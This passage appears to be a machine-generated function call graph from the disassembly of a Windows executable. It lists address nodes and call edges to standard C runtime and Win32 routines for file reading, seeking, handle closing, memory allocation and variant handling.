85482->85484 85485 41aeec ___lock_fhandle LeaveCriticalSection 85483->85485 85484->85483 85485->85478 85487 41aded __lseeki64_nolock 46 API calls 85486->85487 85488 41e18e 85487->85488 85489 41e1a4 SetFilePointer 85488->85489 85490 41e194 85488->85490 85492 41e1c3 85489->85492 85493 41e1bb GetLastError 85489->85493 85491 417f77 __wcsicoll 46 API calls 85490->85491 85494 41e199 85491->85494 85492->85494 85495 417f9d __dosmaperr 46 API calls 85492->85495 85493->85492 85494->85465 85495->85494 85496->85451 85497->85464 85498->85453 85499->85457 85500->85464 85501->85466 85502->85465 85503->85464 85505 4149ea 85504->85505 85506 4149fe 85504->85506 85550 417f77 46 API calls __getptd_noexit 85505->85550 85507 4149fa 85506->85507 85509 41443c __flush 77 API calls 85506->85509 85522 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 85507->85522 85511 414a0a 85509->85511 85510 4149ef 85551 417f25 10 API calls __wcsicoll 85510->85551 85523 41d8c2 85511->85523 85515 414139 __fclose_nolock 46 API calls 85516 414a18 85515->85516 85527 41d7fe 85516->85527 85518 414a1e 85518->85507 85519 413748 _free 46 API calls 85518->85519 85519->85507 85520->85254 85521->85258 85522->85258 85524 41d8d2 85523->85524 85526 414a12 85523->85526 85525 413748 _free 46 API calls 85524->85525 85524->85526 85525->85526 85526->85515 85528 41d80a __alloc_osfhnd 85527->85528 85529 41d812 85528->85529 85530 41d82d 85528->85530 85567 417f8a 46 API calls __getptd_noexit 85529->85567 85532 41d839 85530->85532 85535 41d873 85530->85535 85569 417f8a 46 API calls __getptd_noexit 85532->85569 85533 41d817 85568 417f77 46 API calls __getptd_noexit 85533->85568 85538 41ae56 ___lock_fhandle 48 API calls 85535->85538 85537 41d83e 85570 417f77 46 API calls __getptd_noexit 85537->85570 85540 41d879 85538->85540 85543 41d893 85540->85543 85544 41d887 85540->85544 85541 41d846 85571 417f25 10 API calls __wcsicoll 85541->85571 85572 417f77 46 API calls __getptd_noexit 85543->85572 85552 41d762 85544->85552 85545 41d81f __alloc_osfhnd 85545->85518 85548 41d88d 85573 41d8ba LeaveCriticalSection __unlock_fhandle 85548->85573 85550->85510 85551->85507 85574 41aded 85552->85574 85554 41d7c8 85587 41ad67 47 API calls 2 library calls 85554->85587 85556 41d772 85556->85554 85557 41d7a6 85556->85557 85558 41aded __lseeki64_nolock 46 API calls 85556->85558 85557->85554 85559 41aded __lseeki64_nolock 46 API calls 85557->85559 85561 41d79d 85558->85561 85562 41d7b2 CloseHandle 85559->85562 85560 41d7d0 85563 41d7f2 85560->85563 85588 417f9d 46 API calls 3 library calls 85560->85588 85564 41aded __lseeki64_nolock 46 API calls 85561->85564 85562->85554 85565 41d7be GetLastError 85562->85565 85563->85548 85564->85557 85565->85554 85567->85533 85568->85545 85569->85537 85570->85541 85571->85545 85572->85548 85573->85545 85575 41ae12 85574->85575 85576 41adfa 85574->85576 85578 417f8a __free_osfhnd 46 API calls 85575->85578 85581 41ae51 85575->85581 85577 417f8a __free_osfhnd 46 API calls 85576->85577 85579 41adff 85577->85579 85580 41ae23 85578->85580 85582 417f77 __wcsicoll 46 API calls 85579->85582 85583 417f77 __wcsicoll 46 API calls 85580->85583 85581->85556 85584 41ae07 85582->85584 85585 41ae2b 85583->85585 85584->85556 85586 417f25 __wcsicoll 10 API calls 85585->85586 85586->85584 85587->85560 85588->85563 85590 414c82 __alloc_osfhnd 85589->85590 85591 414cc3 85590->85591 85592 414c96 __crtGetStringTypeA_stat 85590->85592 85593 414cbb __alloc_osfhnd 85590->85593 85594 415471 __lock_file 47 API calls 85591->85594 85616 417f77 46 API calls __getptd_noexit 85592->85616 85593->85263 85596 414ccb 85594->85596 85602 414aba 85596->85602 85597 414cb0 85617 417f25 10 API calls __wcsicoll 85597->85617 85606 414ad8 __crtGetStringTypeA_stat 85602->85606 85608 414af2 85602->85608 85603 414ae2 85669 417f77 46 API calls __getptd_noexit 85603->85669 85605 414ae7 85670 417f25 10 API calls __wcsicoll 85605->85670 85606->85603 85606->85608 85611 414b2d 85606->85611 85618 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 85608->85618 85610 414c38 __crtGetStringTypeA_stat 85672 417f77 46 API calls __getptd_noexit 85610->85672 85611->85608 85611->85610 85612 414139 __fclose_nolock 46 API calls 85611->85612 85619 41dfcc 85611->85619 85649 41d8f3 85611->85649 85671 41e0c2 46 API calls 3 library calls 85611->85671 85612->85611 85616->85597 85617->85593 85618->85593 85620 41dfd8 __alloc_osfhnd 85619->85620 85621 41dfe0 85620->85621 85624 41dffb 85620->85624 85742 417f8a 46 API calls __getptd_noexit 85621->85742 85623 41e007 85744 417f8a 46 API calls __getptd_noexit 85623->85744 85624->85623 85627 41e041 85624->85627 85625 41dfe5 85743 417f77 46 API calls __getptd_noexit 85625->85743 85630 41e063 85627->85630 85631 41e04e 85627->85631 85629 41e00c 85745 417f77 46 API calls __getptd_noexit 85629->85745 85635 41ae56 ___lock_fhandle 48 API calls 85630->85635 85747 417f8a 46 API calls __getptd_noexit 85631->85747 85633 41e014 85746 417f25 10 API calls __wcsicoll 85633->85746 85637 41e069 85635->85637 85636 41e053 85748 417f77 46 API calls __getptd_noexit 85636->85748 85641 41e077 85637->85641 85642 41e08b 85637->85642 85640 41dfed __alloc_osfhnd 85640->85611 85673 41da15 85641->85673 85749 417f77 46 API calls __getptd_noexit 85642->85749 85645 41e083 85751 41e0ba LeaveCriticalSection __unlock_fhandle 85645->85751 85646 41e090 85750 417f8a 46 API calls __getptd_noexit 85646->85750 85650 41d900 85649->85650 85653 41d915 85649->85653 85755 417f77 46 API calls __getptd_noexit 85650->85755 85652 41d905 85756 417f25 10 API calls __wcsicoll 85652->85756 85655 41d94a 85653->85655 85660 41d910 85653->85660 85752 420603 85653->85752 85657 414139 __fclose_nolock 46 API calls 85655->85657 85658 41d95e 85657->85658 85659 41dfcc __read 59 API calls 85658->85659 85661 41d965 85659->85661 85660->85611 85661->85660 85662 414139 __fclose_nolock 46 API calls 85661->85662 85663 41d988 85662->85663 85663->85660 85664 414139 __fclose_nolock 46 API calls 85663->85664 85665 41d994 85664->85665 85665->85660 85666 414139 __fclose_nolock 46 API calls 85665->85666 85667 41d9a1 85666->85667 85668 414139 __fclose_nolock 46 API calls 85667->85668 85668->85660 85669->85605 85670->85608 85671->85611 85672->85605 85674 41da31 85673->85674 85675 41da4c 85673->85675 85676 417f8a __free_osfhnd 46 API calls 85674->85676 85677 41da5b 85675->85677 85679 41da7a 85675->85679 85678 41da36 85676->85678 85680 417f8a __free_osfhnd 46 API calls 85677->85680 85682 417f77 __wcsicoll 46 API calls 85678->85682 85681 41da98 85679->85681 85696 41daac 85679->85696 85683 41da60 85680->85683 85685 417f8a __free_osfhnd 46 API calls 85681->85685 85693 41da3e 85682->85693 85684 417f77 __wcsicoll 46 API calls 85683->85684 85687 41da67 85684->85687 85689 41da9d 85685->85689 85686 41db02 85688 417f8a __free_osfhnd 46 API calls 85686->85688 85690 417f25 __wcsicoll 10 API calls 85687->85690 85691 41db07 85688->85691 85692 417f77 __wcsicoll 46 API calls 85689->85692 85690->85693 85694 417f77 __wcsicoll 46 API calls 85691->85694 85695 41daa4 85692->85695 85693->85645 85694->85695 85699 417f25 __wcsicoll 10 API calls 85695->85699 85696->85686 85696->85693 85697 41dae1 85696->85697 85698 41db1b 85696->85698 85697->85686 85705 41daec ReadFile 85697->85705 85701 416b04 __malloc_crt 46 API calls 85698->85701 85699->85693 85702 41db31 85701->85702 85706 41db59 85702->85706 85707 41db3b 85702->85707 85703 41dc17 85704 41df8f GetLastError 85703->85704 85712 41dc2b 85703->85712 85708 41de16 85704->85708 85709 41df9c 85704->85709 85705->85703 85705->85704 85713 420494 __lseeki64_nolock 48 API calls 85706->85713 85711 417f77 __wcsicoll 46 API calls 85707->85711 85716 417f9d __dosmaperr 46 API calls 85708->85716 85722 41dd9b 85708->85722 85710 417f77 __wcsicoll 46 API calls 85709->85710 85714 41dfa1 85710->85714 85715 41db40 85711->85715 85721 41de5b 85712->85721 85712->85722 85723 41dc47 85712->85723 85717 41db67 85713->85717 85718 417f8a __free_osfhnd 46 API calls 85714->85718 85719 417f8a __free_osfhnd 46 API calls 85715->85719 85716->85722 85717->85705 85718->85722 85719->85693 85720 413748 _free 46 API calls 85720->85693 85721->85722 85725 41ded0 ReadFile 85721->85725 85722->85693 85722->85720 85724 41dcab ReadFile 85723->85724 85726 41dd28 85723->85726 85727 41dcc9 GetLastError 85724->85727 85734 41dcd3 85724->85734 85728 41deef GetLastError 85725->85728 85735 41def9 85725->85735 85726->85722 85731 41dd96 85726->85731 85733 41dda3 85726->85733 85737 41dd60 85726->85737 85727->85723 85727->85734 85728->85721 85728->85735 85729 41ddec MultiByteToWideChar 85729->85722 85730 41de10 GetLastError 85729->85730 85730->85708 85732 417f77 __wcsicoll 46 API calls 85731->85732 85732->85722 85733->85737 85738 41ddda 85733->85738 85734->85723 85739 420494 __lseeki64_nolock 48 API calls 85734->85739 85735->85721 85736 420494 __lseeki64_nolock 48 API calls 85735->85736 85736->85735 85737->85729 85740 420494 __lseeki64_nolock 48 API calls 85738->85740 85739->85734 85741 41dde9 85740->85741 85741->85729 85742->85625 85743->85640 85744->85629 85745->85633 85746->85640 85747->85636 85748->85633 85749->85646 85750->85645 85751->85640 85753 416b04 __malloc_crt 46 API calls 85752->85753 85754 420618 85753->85754 85754->85655 85755->85652 85756->85660 85760 4148b3 GetSystemTimeAsFileTime __aulldiv 85757->85760 85759 442c6b 85759->85266 85760->85759 85761->85273 85762->85279 85763->85279 85769 45272f __tzset_nolock _wcscpy 85764->85769 85765 44afef GetSystemTimeAsFileTime 85765->85769 85766 414d04 61 API calls __fread_nolock 85766->85769 85767 4528a4 85767->85188 85767->85189 85768 4150d1 81 API calls _fseek 85768->85769 85769->85765 85769->85766 85769->85767 85769->85768 85771 44b1bc 85770->85771 85772 44b1ca 85770->85772 85773 4149c2 116 API calls 85771->85773 85774 44b1e1 85772->85774 85775 44b1d8 85772->85775 85776 4149c2 116 API calls 85772->85776 85773->85772 85805 4321a4 85774->85805 85775->85215 85778 44b2db 85776->85778 85778->85774 85780 44b2e9 85778->85780 85779 44b224 85782 44b253 85779->85782 85783 44b228 85779->85783 85781 44b2f6 85780->85781 85784 414a46 __fcloseall 82 API calls 85780->85784 85781->85215 85809 43213d 85782->85809 85786 44b235 85783->85786 85788 414a46 __fcloseall 82 API calls 85783->85788 85784->85781 85789 44b245 85786->85789 85792 414a46 __fcloseall 82 API calls 85786->85792 85787 44b25a 85790 44b260 85787->85790 85791 44b289 85787->85791 85788->85786 85789->85215 85793 44b26d 85790->85793 85795 414a46 __fcloseall 82 API calls 85790->85795 85819 44b0bf 87 API calls 85791->85819 85792->85789 85796 44b27d 85793->85796 85799 414a46 __fcloseall 82 API calls 85793->85799 85795->85793 85796->85215 85797 44b28f 85820 4320f8 46 API calls _free 85797->85820 85799->85796 85800 44b295 85801 44b2a2 85800->85801 85802 414a46 __fcloseall 82 API calls 85800->85802 85803 44b2b2 85801->85803 85804 414a46 __fcloseall 82 API calls 85801->85804 85802->85801 85803->85215 85804->85803 85806 4321cb 85805->85806 85808 4321b4 __tzset_nolock _memmove 85805->85808 85807 414d04 __fread_nolock 61 API calls 85806->85807 85807->85808 85808->85779 85810 4135bb _malloc 46 API calls 85809->85810 85811 432150 85810->85811 85812 4135bb _malloc 46 API calls 85811->85812 85813 432162 85812->85813 85814 4135bb _malloc 46 API calls 85813->85814 85815 432174 85814->85815 85817 432189 85815->85817 85821 4320f8 46 API calls _free 85815->85821 85817->85787 85818 432198 85818->85787 85819->85797 85820->85800 85821->85818 85822->85118 85823->85121 85824->85136 85825->85136 85826->85136 85827->85135 85828->85136 85829->85136 85830->85143 85831->85152 85832->85154 85833->85154 85883 410160 85834->85883 85836 41012f GetFullPathNameW 85837 410147 moneypunct 85836->85837 85837->84974 85839 4102cb SHGetDesktopFolder 85838->85839 85842 410333 _wcsncpy 85838->85842 85840 4102e0 _wcsncpy 85839->85840 85839->85842 85841 41031c SHGetPathFromIDListW 85840->85841 85840->85842 85841->85842 85842->84977 85844 4101bb 85843->85844 85849 425f4a 85843->85849 85845 410160 52 API calls 85844->85845 85847 4101c7 85845->85847 85846 4114ab __wcsicoll 58 API calls 85846->85849 85887 410200 52 API calls 2 library calls 85847->85887 85849->85846 85851 425f6e 85849->85851 85850 4101d6 85888 410200 52 API calls 2 library calls 85850->85888 85851->84979 85853 4101e9 85853->84979 85855 40f760 126 API calls 85854->85855 85856 40f584 85855->85856 85857 429335 85856->85857 85858 40f58c 85856->85858 85861 4528bd 118 API calls 85857->85861 85859 40f598 85858->85859 85860 429358 85858->85860 85906 4033c0 113 API calls 7 library calls 85859->85906 85907 434034 86 API calls _wprintf 85860->85907 85863 42934b 85861->85863 85866 429373 85863->85866 85867 42934f 85863->85867 85865 40f5b4 85865->84975 85869 4115d7 52 API calls 85866->85869 85870 431e58 82 API calls 85867->85870 85868 429369 85868->85866 85879 4293c5 moneypunct 85869->85879 85870->85860 85871 42959c 85872 413748 _free 46 API calls 85871->85872 85873 4295a5 85872->85873 85874 431e58 82 API calls 85873->85874 85875 4295b1 85874->85875 85879->85871 85880 401b10 52 API calls 85879->85880 85889 444af8 85879->85889 85892 402780 85879->85892 85900 4022d0 85879->85900 85908 44c7dd 64 API calls 3 library calls 85879->85908 85909 44b41c 52 API calls 85879->85909 85880->85879 85884 410167 _wcslen 85883->85884 85885 4115d7 52 API calls 85884->85885 85886 41017e _wcscpy 85885->85886 85886->85836 85887->85850 85888->85853 85890 4115d7 52 API calls 85889->85890 85891 444b27 _memmove 85890->85891 85891->85879 85893 402827 85892->85893 85898 402790 moneypunct _memmove 85892->85898 85895 4115d7 52 API calls 85893->85895 85894 4115d7 52 API calls 85896 402797 85894->85896 85895->85898 85897 4115d7 52 API calls 85896->85897 85899 4027bd 85896->85899 85897->85899 85898->85894 85899->85879 85901 4022e0 85900->85901 85904 40239d 85900->85904 85902 4115d7 52 API calls 85901->85902 85901->85904 85905 402320 moneypunct 85901->85905 85902->85905 85903 4115d7 52 API calls 85903->85905 85904->85879 85905->85903 85905->85904 85906->85865 85907->85868 85908->85879 85909->85879 85911 402539 moneypunct 85910->85911 85912 402417 85910->85912 85911->84983 85912->85911 85913 4115d7 52 API calls 85912->85913 85914 402443 85913->85914 85915 4115d7 52 API calls 85914->85915 85917 4024b4 85915->85917 85917->85911 85918 4022d0 52 API calls 85917->85918 85939 402880 95 API calls 2 library calls 85917->85939 85918->85917 85923 401566 85919->85923 85920 401794 85940 40e9a0 90 API calls 85920->85940 85922 40167a 85926 4017c0 85922->85926 85941 45e737 90 API calls 3 library calls 85922->85941 85923->85920 85923->85922 85925 4010a0 52 API calls 85923->85925 85925->85923 85926->84985 85928 40bc70 52 API calls 85927->85928 85938 40d451 85928->85938 85929 40d50f 85944 410600 52 API calls 85929->85944 85931 427c01 85945 45e737 90 API calls 3 library calls 85931->85945 85932 40e0a0 52 API calls 85932->85938 85934 401b10 52 API calls 85934->85938 85935 40d519 85935->84988 85938->85929 85938->85931 85938->85932 85938->85934 85938->85935 85942 40f310 53 API calls 85938->85942 85943 40d860 91 API calls 85938->85943 85939->85917 85940->85922 85941->85926 85942->85938 85943->85938 85944->85935 85945->85935 85946->85001 85947->85002 85949 42c5fe 85948->85949 85964 4091c6 85948->85964 85950 40bc70 52 API calls 85949->85950 85949->85964 85951 42c64e InterlockedIncrement 85950->85951 85952 42c665 85951->85952 85957 42c697 85951->85957 85955 42c672 InterlockedDecrement Sleep InterlockedIncrement 85952->85955 85952->85957 85953 42c737 InterlockedDecrement 85954 42c74a 85953->85954 85958 408f40 VariantClear 85954->85958 85955->85952 85955->85957 85956 42c731 85956->85953 85957->85953 85957->85956 86241 408e80 85957->86241 85960 42c752 85958->85960 86254 410c60 85960->86254 85964->85050 85965 42c6db 85966 402160 52 API calls 85965->85966 85967 42c6e5 85966->85967 85968 45340c 85 API calls 85967->85968 85969 42c6f1 85968->85969 86251 40d200 52 API calls 2 library calls 85969->86251 85971 42c6fb 86252 465124 53 API calls 85971->86252 85973 42c715 85974 42c76a 85973->85974 85975 42c719 85973->85975 85976 401b10 52 API calls 85974->85976 86253 46fe32 VariantClear 85975->86253 85978 42c77e 85976->85978 85979 401980 53 API calls 85978->85979 85985 42c796 85979->85985 85980 42c812 86265 46fe32 VariantClear 85980->86265 85982 42c82a InterlockedDecrement 86266 46ff07 54 API calls 85982->86266 85984 42c864 86267 45e737 90 API calls 3 library calls 85984->86267 85985->85980 85985->85984 86259 40ba10 85985->86259 85986 42c9ec 86309 47d33e 330 API calls 85986->86309 85990 42c9fe 85992 408f40 VariantClear 85998 42c849 85992->85998 85994 42c874 85997 408f40 VariantClear 85994->85997 86005 42ca59 85994->86005 85995 402780 52 API calls 85995->85998 86000 42c891 85997->86000 85998->85986 85998->85992 85998->85995 86001 401980 53 API calls 85998->86001 86268 40a780 85998->86268 86003 410c60 VariantClear 86000->86003 86001->85998 86003->85964 86005->86005 86007 40afc4 86006->86007 86008 40b156 86006->86008 86009 40afd5 86007->86009 86010 42d1e3 86007->86010 86324 45e737 90 API calls 3 library calls 86008->86324 86015 40a780 199 API calls 86009->86015 86030 40b11a moneypunct 86009->86030 86325 45e737 90 API calls 3 library calls 86010->86325 86013 40b143 86013->85050 86014 42d1f8 86019 408f40 VariantClear 86014->86019 86017 40b00a 86015->86017 86017->86014 86020 40b012 86017->86020 86018 42d4db 86018->86018 86019->86013 86021 40b04a 86020->86021 86022 42d231 VariantClear 86020->86022 86029 40b094 moneypunct 86020->86029 86028 40b05c moneypunct 86021->86028 86326 40e270 VariantClear moneypunct 86021->86326 86022->86028 86023 42d45a VariantClear 86023->86030 86025 40b108 86025->86030 86327 40e270 VariantClear moneypunct 86025->86327 86027 4115d7 52 API calls 86027->86029 86028->86027 86028->86029 86029->86025 86031 42d425 moneypunct 86029->86031 86030->86013 86328 45e737 90 API calls 3 library calls 86030->86328 86031->86023 86031->86030 86033 408fff 86032->86033 86053 40900d 86032->86053 86375 403ea0 52 API calls __cinit 86033->86375 86036 42c3f6 86378 45e737 90 API calls 3 library calls 86036->86378 86038 42c44a 86380 45e737 90 API calls 3 library calls 86038->86380 86039 40a780 199 API calls 86039->86053 86040 4090f2 moneypunct 86040->85050 86041 42c47b 86381 451b42 61 API calls 86041->86381 86045 42c4cb 86329 47faae 86045->86329 86046 42c564 86047 408f40 VariantClear 86046->86047 86047->86040 86048 42c491 86048->86040 86382 45e737 90 API calls 3 library calls 86048->86382 86050 42c548 86385 45e737 90 API calls 3 library calls 86050->86385 86051 42c4da 86051->86040 86383 45e737 90 API calls 3 library calls 86051->86383 86052 409112 86052->86050 86063 40912b 86052->86063 86053->86036 86053->86038 86053->86039 86053->86040 86053->86041 86053->86045 86053->86046 86053->86050 86053->86052 86054 4090df 86053->86054 86056 42c528 86053->86056 86058 4090ea 86053->86058 86377 4534e3 52 API calls 86053->86377 86379 40c4e0 199 API calls 86053->86379 86054->86058 86059 408e80 VariantClear 86054->86059 86384 45e737 90 API calls 3 library calls 86056->86384 86062 408f40 VariantClear 86058->86062 86059->86058 86062->86040 86063->86040 86376 403e10 53 API calls 86063->86376 86065 40914b 86066 408f40 VariantClear 86065->86066 86066->86040 86572 408d90 86067->86572 86069 429778 86070 410c60 VariantClear 86069->86070 86071 429780 86070->86071 86072 408cf9 86072->86069 86073 42976c 86072->86073 86075 408d2d 86072->86075 86597 45e737 90 API calls 3 library calls 86073->86597 86588 403d10 86075->86588 86078 408d71 moneypunct 86078->85050 86079 408f40 VariantClear 86080 408d45 moneypunct 86079->86080 86080->86078 86080->86079 86082 425c87 86081->86082 86083 40d15f 86081->86083 86084 425cc7 86082->86084 86085 425ca1 TranslateAcceleratorW 86082->86085 86083->85050 86085->86083 86087 42602f 86086->86087 86090 40d17f 86086->86090 86087->85050 86088 40d18c 86088->85050 86089 42608e IsDialogMessageW 86089->86088 86089->86090 86090->86088 86090->86089 86811 430c46 GetClassLongW 86090->86811 86093 4096c6 _wcslen 86092->86093 86094 4115d7 52 API calls 86093->86094 86156 40a70c moneypunct _memmove 86093->86156 86095 4096fa _memmove 86094->86095 86097 4115d7 52 API calls 86095->86097 86096 4013a0 52 API calls 86098 4297aa 86096->86098 86099 40971b 86097->86099 86101 4115d7 52 API calls 86098->86101 86100 409749 CharUpperBuffW 86099->86100 86103 40976a moneypunct 86099->86103 86099->86156 86100->86103 86143 4297d1 _memmove 86101->86143 86151 4097e5 moneypunct 86103->86151 86813 47dcbb 201 API calls 86103->86813 86105 42a452 86106 408f40 VariantClear 86105->86106 86107 42ae92 86106->86107 86108 410c60 VariantClear 86107->86108 86109 42aea4 86108->86109 86110 409aa2 86112 4115d7 52 API calls 86110->86112 86117 409afe 86110->86117 86110->86143 86111 40a689 86114 4115d7 52 API calls 86111->86114 86112->86117 86113 4115d7 52 API calls 86113->86151 86130 40a6af moneypunct _memmove 86114->86130 86115 409b2a 86119 429dbe 86115->86119 86180 409b4d moneypunct _memmove 86115->86180 86819 40b400 VariantClear VariantClear moneypunct 86115->86819 86116 40c2c0 52 API calls 86116->86151 86117->86115 86118 4115d7 52 API calls 86117->86118 86120 429d31 86118->86120 86125 429dd3 86119->86125 86820 40b400 VariantClear VariantClear moneypunct 86119->86820 86124 429d42 86120->86124 86816 44a801 52 API calls 86120->86816 86121 429a46 VariantClear 86121->86151 86122 409fd2 86127 40a045 86122->86127 86179 42a3f5 86122->86179 86134 40e0a0 52 API calls 86124->86134 86136 40e1c0 VariantClear 86125->86136 86125->86180 86132 4115d7 52 API calls 86127->86132 86128 408f40 VariantClear 86128->86151 86137 4115d7 52 API calls 86130->86137 86138 40a04c 86132->86138 86139 429d57 86134->86139 86136->86180 86137->86156 86142 40a0a7 86138->86142 86146 4091e0 316 API calls 86138->86146 86817 453443 52 API calls 86139->86817 86140 40ba10 52 API calls 86140->86151 86141 42a42f 86824 45e737 90 API calls 3 library calls 86141->86824 86163 40a0af 86142->86163 86825 40c790 VariantClear moneypunct 86142->86825 86836 45e737 90 API calls 3 library calls 86143->86836 86144 4299d9 86148 408f40 VariantClear 86144->86148 86146->86142 86147 429abd 86147->85050 86152 4299e2 86148->86152 86149 429d88 86818 453443 52 API calls 86149->86818 86151->86105 86151->86110 86151->86111 86151->86113 86151->86116 86151->86121 86151->86128 86151->86130 86151->86140 86151->86143 86151->86144 86151->86147 86158 40a780 199 API calls 86151->86158 86814 40c4e0 199 API calls 86151->86814 86815 40e270 VariantClear moneypunct 86151->86815 86161 410c60 VariantClear 86152->86161 86156->86096 86158->86151 86159 402780 52 API calls 86159->86180 86160 44a801 52 API calls 86160->86180 86215 40a650 moneypunct 86161->86215 86162 408f40 VariantClear 86193 40a162 moneypunct _memmove 86162->86193 86164 40a11b 86163->86164 86166 42a4b4 VariantClear 86163->86166 86163->86193 86171 40a12d moneypunct 86164->86171 86826 40e270 VariantClear moneypunct 86164->86826 86165 40a780 199 API calls 86165->86180 86166->86171 86167 401980 53 API calls 86167->86180 86168 408e80 VariantClear 86168->86180 86170 4115d7 52 API calls 86170->86193 86171->86170 86171->86193 86172 408e80 VariantClear 86172->86193 86174 42a74d VariantClear 86174->86193 86175 41130a 51 API calls __cinit 86175->86180 86176 4115d7 52 API calls 86176->86180 86177 40a368 86178 42aad4 86177->86178 86187 40a397 86177->86187 86829 46fe90 VariantClear VariantClear moneypunct 86178->86829 86823 47390f VariantClear 86179->86823 86180->86122 86180->86141 86180->86156 86180->86159 86180->86160 86180->86165 86180->86167 86180->86168 86180->86175 86180->86176 86180->86179 86185 409c95 86180->86185 86821 45f508 52 API calls 86180->86821 86822 403e10 53 API calls 86180->86822 86181 42a886 VariantClear 86181->86193 86182 42a7e4 VariantClear 86182->86193 86183 40a3ce 86197 40a3d9 moneypunct 86183->86197 86830 40b400 VariantClear VariantClear moneypunct 86183->86830 86185->85050 86186 40e270 VariantClear 86186->86193 86187->86183 86209 40a42c moneypunct 86187->86209 86812 40b400 VariantClear VariantClear moneypunct 86187->86812 86190 42abaf 86195 42abd4 VariantClear 86190->86195 86203 40a4ee moneypunct 86190->86203 86191 4115d7 52 API calls 86191->86193 86192 4115d7 52 API calls 86196 42a5a6 VariantInit VariantCopy 86192->86196 86193->86162 86193->86172 86193->86174 86193->86177 86193->86178 86193->86181 86193->86182 86193->86186 86193->86191 86193->86192 86827 470870 52 API calls 86193->86827 86828 44ccf1 VariantClear moneypunct 86193->86828 86194 40a4dc 86194->86203 86832 40e270 VariantClear moneypunct 86194->86832 86195->86203 86196->86193 86199 42a5c6 VariantClear 86196->86199 86198 40a41a 86197->86198 86205 42ab44 VariantClear 86197->86205 86197->86209 86198->86209 86831 40e270 VariantClear moneypunct 86198->86831 86199->86193 86200 42ac4f 86206 42ac79 VariantClear 86200->86206 86211 40a546 moneypunct 86200->86211 86203->86200 86204 40a534 86203->86204 86204->86211 86833 40e270 VariantClear moneypunct 86204->86833 86205->86209 86206->86211 86207 42ad28 86213 42ad4e VariantClear 86207->86213 86218 40a583 moneypunct 86207->86218 86209->86190 86209->86194 86211->86207 86212 40a571 86211->86212 86212->86218 86834 40e270 VariantClear moneypunct 86212->86834 86213->86218 86215->85050 86216 42ae0e VariantClear 86216->86218 86218->86215 86218->86216 86835 40e270 VariantClear moneypunct 86218->86835 86219->85050 86220->85012 86221->85017 86222->85050 86223->85050 86224->85050 86225->85050 86226->85060 86227->85060 86228->85060 86229->85060 86230->85060 86231->85060 86232->85060 86234 403cdf 86233->86234 86235 408f40 VariantClear 86234->86235 86236 403ce7 86235->86236 86236->85058 86237->85060 86238->85060 86239->85050 86240->85009 86242 408e88 86241->86242 86244 408e94 86241->86244 86243 408f40 VariantClear 86242->86243 86243->86244 86245 45340c 86244->86245 86246 453439 86245->86246 86247 453419 86245->86247 86246->85965 86248 45342f 86247->86248 86311 4531b1 85 API calls 5 library calls 86247->86311 86248->85965 86250 453425 86250->85965 86251->85971 86252->85973 86253->85956 86255 410c73 moneypunct 86254->86255 86256 428372 86254->86256 86255->85964 86258 42838c 86256->86258 86312 40e1c0 86256->86312 86260 40ba49 86259->86260 86261 40ba1b moneypunct _memmove 86259->86261 86263 4115d7 52 API calls 86260->86263 86262 4115d7 52 API calls 86261->86262 86264 40ba22 86262->86264 86263->86261 86264->85985 86265->85982 86266->85998 86267->85994 86269 40a7a6 86268->86269 86270 40ae8c 86268->86270 86309->85990 86311->86250 86313 408f40 VariantClear 86312->86313 86314 40e1cb moneypunct 86313->86314 86314->86256 86324->86010 86325->86014 86326->86028 86327->86030 86328->86018 86330 408e80 VariantClear 86329->86330 86338 47fb02 86330->86338 86333 47fc59 86334 40a780 199 API calls 86333->86334 86337 47fc6a 86334->86337 86335 47fc2b 86339 408f40 VariantClear 86335->86339 86337->86335 86342 47fc7d 86337->86342 86343 47fc8c 86337->86343 86338->86333 86338->86335 86352 47fcd4 86338->86352 86355 408e80 VariantClear 86338->86355 86361 408f40 VariantClear 86338->86361 86371 47fc1d 86338->86371 86386 475a67 86338->86386 86414 47b291 86338->86414 86425 46fe32 VariantClear 86338->86425 86340 47fc33 86339->86340 86341 408f40 VariantClear 86340->86341 86344 47fc3b 86341->86344 86427 45e737 90 API calls 3 library calls 86342->86427 86346 40ba10 52 API calls 86343->86346 86347 408f40 VariantClear 86344->86347 86348 47fc98 86346->86348 86350 47fc43 86347->86350 86428 47b2f4 144 API calls 86348->86428 86353 410c60 VariantClear 86350->86353 86351 47fca7 86354 408f40 VariantClear 86351->86354 86357 408f40 VariantClear 86352->86357 86356 47fc4b 86353->86356 86358 47fcb1 86354->86358 86355->86338 86356->86051 86359 47fcdc 86357->86359 86360 408f40 VariantClear 86358->86360 86362 408f40 VariantClear 86359->86362 86363 47fcb9 86360->86363 86361->86338 86364 47fce4 86362->86364 86365 408f40 VariantClear 86363->86365 86366 408f40 VariantClear 86364->86366 86368 47fcc1 86365->86368 86367 47fcec 86366->86367 86369 410c60 VariantClear 86367->86369 86370 410c60 VariantClear 86368->86370 86372 47fcf4 86369->86372 86373 47fcc9 86370->86373 86426 45e538 90 API calls 3 library calls 86371->86426 86372->86051 86373->86051 86375->86053 86376->86065 86377->86053 86378->86040 86379->86053 86380->86040 86381->86048 86382->86040 86383->86040 86384->86040 86385->86046 86387 475ae5 86386->86387 86390 475ac5 86386->86390 86429 45e737 90 API calls 3 library calls 86387->86429 86389 475afe 86391 408f40 VariantClear 86389->86391 86390->86387 86392 402780 52 API calls 86390->86392 86393 475b42 86390->86393 86396 475b06 86391->86396 86392->86390 86394 402780 52 API calls 86393->86394 86404 475b60 86394->86404 86395 475c7c 86397 408f40 VariantClear 86395->86397 86396->86338 86400 475c84 86397->86400 86398 40c2c0 52 API calls 86398->86404 86399 40a780 199 API calls 86399->86404 86400->86338 86401 475cc7 86402 408f40 VariantClear 86401->86402 86409 475ca8 86402->86409 86403 40ba10 52 API calls 86403->86404 86404->86395 86404->86398 86404->86399 86404->86401 86404->86403 86405 475cd5 86404->86405 86406 408f40 VariantClear 86404->86406 86411 475ca0 86404->86411 86430 40c4e0 199 API calls 86404->86430 86431 45e737 90 API calls 3 library calls 86405->86431 86406->86404 86409->86338 86410 475ce8 86412 408f40 VariantClear 86410->86412 86413 408f40 VariantClear 86411->86413 86412->86409 86413->86409 86415 47b2e7 86414->86415 86416 47b2a5 86414->86416 86415->86338 86432 40e710 86416->86432 86419 47b2b7 86443 47974b 86419->86443 86420 47b2cf 86422 47974b 144 API calls 86420->86422 86424 47b2df 86422->86424 86423 47b2c7 86423->86338 86424->86338 86425->86338 86426->86335 86427->86335 86428->86351 86429->86389 86430->86404 86431->86410 86433 408f40 VariantClear 86432->86433 86434 